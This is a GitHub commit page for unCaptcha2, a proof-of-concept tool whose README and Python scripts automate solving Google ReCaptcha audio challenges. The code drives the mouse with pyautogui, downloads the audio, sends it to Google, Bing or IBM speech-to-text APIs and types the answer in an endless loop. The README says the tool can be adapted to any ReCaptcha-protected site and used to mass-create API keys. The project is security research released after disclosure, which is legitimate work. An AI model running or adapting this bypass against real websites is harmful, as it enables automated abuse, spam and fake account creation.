Browse files

Added all files

  • Loading branch information...
ecthros committed Dec 31, 2018
1 parent dc77c70 commit 4121e0ecdc2243f7347a5fb2f3b2dde899f728b3
Showing with 287 additions and 1 deletion.
  1. +60 −1
  2. +3 −0 dependencies.txt
  3. +61 −0
  4. +163 −0
@@ -1 +1,60 @@
# uncaptcha2
<p align="center"> :warning: This code works against Google's most recent version ReCaptcha. Please do not attack any non-personal websites. :warning:</p>

Created in April 2017, [unCaptcha]( achieved 85% accuracy defeating Google's ReCaptcha. After the release of this work, Google released an update to ReCaptcha with the following major changes:
* Better browser automation detection
* Spoken phrases rather than digits

These changes were initially successful in protecting against the original unCaptcha attack. However, as of June 2018, these challenges have been solved. We have been in contact with the ReCaptcha team for over six months and they are fully aware of this attack. The team has allowed us to release the code, despite its current success.

# Introducing unCaptcha2

Thanks to the changes to the audio challenge, passing ReCaptcha is easier than ever before. The code now only needs to make a single request to a free, publicly available speech to text API to achieve around *90% accuracy* over all captchas.

Since the changes to ReCaptcha prevent Selenium, a browser automation engine, unCaptcha2 uses a screen clicker to move to certain pixels on the screen and move around the page like a human. There is certainly work to be done here - the coordinates need to be updated for each new user and is not the most robust.

# The Approach

unCaptcha2's approach is very simple:
1. Navigate to Google's ReCaptcha Demo site
2. Navigate to audio challenge for ReCaptcha
3. Download audio challenge
4. Submit audio challenge to Speech To Text
5. Parse response and type answer
6. Press submit and check if successful

# Demo


# How To Use

Since unCaptcha2 has to go to specific coordinates on the screen, you'll need to update the coordinates based on your setup. These coordinates are located at the top of On Linux, using the command `xdotool getmouselocation --shell` to find the coordinates of your mouse may be helpful.

You'll also need to set your credentials for whichever speech-to-text API you choose. Since Google's, Microsoft's, and IBM's speech-to-text systems seem to work the best, those are already included in You'll have to set the username and password as required; for Google's API, you'll have to set an environment variable (GOOGLE_APPLICATION_CREDENTIALS) with a file containing your Google application credentials.

Finally, install the dependencies, using `pip install -r dependencies.txt`.

# Responsible Disclosure

We contacted the Recaptcha team in June 2018 to alert them that the updates to the Recaptcha system made it less secure, and a formal issue was opened on June 27th, 2018. We demonstrated a fully functional version of this attack soon thereafter. We chose to wait 6 months after the initial disclosure to give the Recaptcha team time to address the underlying architectural issues in the Recaptcha system. The Recaptcha team is aware of this attack vector, and have confirmed they are okay with us releasing this code, despite its current success rate.

This attack vector was deemed out of scope for the bug bounty program.

# Disclaimer

unCaptcha2, like the original version, is meant to be a proof of concept. As Google updates its service, this repository will *not* be updated. As a result, it is not expected to work in the future, and is likely to break at any time.

Unfortunately, due to Google's work in browser automation detection, this version of unCaptcha does not use Selenium. As a result, the code has to navigate to specific parts of the screen. To see unCaptcha working for yourself, you will need to change the coordinates for your screen resolution.

While unCaptcha2 is tuned for Google's Demo site, it can be changed to work for any such site - the logic for defeating ReCaptcha will be the same.

Additionally, we have removed our API keys from all the necessary queries. If you are looking to recreate some of the work or are doing your own research in this area, you will need to acquire API keys from each of the six services used. These keys are delineated in our files by a long string of the character 'X'. It's worth noting that the only protection against creating multiple API keys is ReCaptcha - therefore, unCaptcha could be made self sufficient by solving captchas to sign up for new API keys.

As always, thanks to everyone who puts up with me, including,


[Dave Levin](


@@ -0,0 +1,3 @@
@@ -0,0 +1,61 @@
import speech_recognition as sr

global r
r = sr.Recognizer()

#################### SPEECH-TO-TEXT WEB APIS ####################
###### The following functions interact with the APIs we used to query for each segment ########
###### Keys have been removed from this section #######

#Query Wit
def wit(audio):
# recognize speech using
WIT_AI_KEY = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXx" # keys are 32-character uppercase alphanumeric strings
#print(" ")
return r.recognize_wit(audio, key=WIT_AI_KEY)
except sr.UnknownValueError:
print(" could not understand audio")
return "None"
except sr.RequestError as e:
print("Could not request results from service; {0}".format(e))
return "None"

def bing(audio):
BING_KEY = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
# recognize speech using Microsoft Bing Voice Recognition
#print("Microsoft Bing Voice Recognition: ")
return r.recognize_bing(audio, key=BING_KEY)
except sr.UnknownValueError:
print("Microsoft Bing Voice Recognition could not understand audio")
return "None"
except sr.RequestError as e:
print("Could not request results from Microsoft Bing Voice Recognition service; {0}".format(e))
return "None"

# Query IBM
def ibm(audio):

# recognize speech using IBM Speech to Text
IBM_USERNAME = "xxxxxxxxxxxxxxxxxxxxxxxxxx" # IBM Speech to Text usernames are strings of the form XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
IBM_PASSWORD = "xxxxxxxxxxxxxxxxx" # IBM Speech to Text passwords are mixed-case alphanumeric strings
#print("IBM Speech to Text: ")
return r.recognize_ibm(audio, username=IBM_USERNAME, password=IBM_PASSWORD, show_all=False)
except sr.UnknownValueError:
print("IBM Speech to Text could not understand audio")
return "None"
except sr.RequestError as e:
print("Could not request results from IBM Speech to Text service; {0}".format(e))
return "None"

#Query Google Speech-To-Text
def google(audio):
#print("Google: ")
return r.recognize_google(audio)
print("Google could not understand")
return "None"
@@ -0,0 +1,163 @@
import time
import pyautogui
import speech_recognition as sr
import os
import subprocess
from queryAPI import bing, google, ibm

''' You'll need to update based on the coordinates of your setup '''
FIREFOX_ICON_COORDS = (25, 67) # Location of the Firefox icon on the side toolbar (to left click)
PRIVATE_COORDS = (178, 69) # Location of "Open a new Private Window"
PRIVATE_BROWSER = (800, 443) # A place where the background of the Private Window will be
PRIVATE_COLOR = '#25003E' # The color of the background of the Private Window
SEARCH_COORDS = (417, 142) # Location of the Firefox Search box
REFRESH_COORDS = (181, 137) # Refresh button
GOOGLE_LOCATION = (117, 104) # Location of the Google Icon after navigating to
GOOGLE_COLOR = '#C3D8FC' # Color of the Google Icon
CAPTCHA_COORDS = (154, 531) # Coordinates of the empty CAPTCHA checkbox
CHECK_COORDS = (158, 542) # Location where the green checkmark will be
CHECK_COLOR = '#35B178' # Color of the green checkmark
AUDIO_COORDS = (258, 797) # Location of the Audio button
DOWNLOAD_COORDS = (318, 590) # Location of the Download button
FINAL_COORDS = (315, 534) # Text entry box
VERIFY_COORDS = (406, 647) # Verify button
CLOSE_LOCATION = (1095, 75)

DOWNLOAD_LOCATION = "../Downloads/"
''' END SETUP '''

r = sr.Recognizer()

def runCommand(command):
''' Run a command and get back its output '''
proc = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
return proc.communicate()[0].split()[0]

def waitFor(coords, color):
''' Wait for a coordinate to become a certain color '''
numWaitedFor = 0
while color != runCommand("eval $(xdotool getmouselocation --shell); xwd -root -silent | convert xwd:- -depth 8 -crop \"1x1+$X+$Y\" txt:- | grep -om1 '#\w\+'"):
numWaitedFor += 1
if numWaitedFor > 25:
return -1
return 0

def downloadCaptcha():
''' Navigate to demo site, input user info, and download a captcha. '''
print("Opening Firefox")
if waitFor(PRIVATE_BROWSER, PRIVATE_COLOR) == -1: # Wait for browser to load
return -1

print("Visiting Demo Site")
# Check if the page is loaded...
if waitFor(GOOGLE_LOCATION, GOOGLE_COLOR) == -1: # Waiting for site to load
return -1

print("Downloading Captcha")
if CHECK_COLOR in runCommand("eval $(xdotool getmouselocation --shell); xwd -root -silent | convert xwd:- -depth 8 -crop \"1x1+$X+$Y\" txt:- | grep -om1 '#\w\+'"):
print ("Already completed captcha.")
return 2
return 0

def checkCaptcha():
''' Check if we've completed the captcha successfully. '''
if CHECK_COLOR in runCommand("eval $(xdotool getmouselocation --shell); xwd -root -silent | convert xwd:- -depth 8 -crop \"1x1+$X+$Y\" txt:- | grep -om1 '#\w\+'"):
print ("Successfully completed captcha.")
output = 1
print("An error occured.")
output = 0
return output

def runCap():
print("Removing old files...")
os.system('rm ./audio.wav 2>/dev/null') # These files may be left over from previous runs, and should be removed just in case.
os.system('rm ' + DOWNLOAD_LOCATION + 'audio.mp3 2>/dev/null')
# First, download the file
downloadResult = downloadCaptcha()
if downloadResult == 2:
return 2
elif downloadResult == -1:
return 3

# Convert the file to a format our APIs will understand
print("Converting Captcha...")
os.system("echo 'y' | ffmpeg -i " + DOWNLOAD_LOCATION + "audio.mp3 ./audio.wav 2>/dev/null")
with sr.AudioFile('./audio.wav') as source:
audio = r.record(source)

print("Submitting To Speech to Text:")
determined = google(audio) # Instead of google, you can use ibm or bing here

print("Inputting Answer")
# Input the captcha
pyautogui.typewrite(determined, interval=.05)

print("Verifying Answer")
# Check that the captcha is completed
result = checkCaptcha()
return result
except Exception as e:
return 3

if __name__ == '__main__':
success = 0
fail = 0
allowed = 0

# Run this forever and print statistics
while True:
res = runCap()
if res == 1:
success += 1
elif res == 2: # Sometimes google just lets us in
allowed += 1
fail += 1

print("SUCCESSES: " + str(success) + " FAILURES: " + str(fail) + " Allowed: " + str(allowed))

0 comments on commit 4121e0e

Please sign in to comment.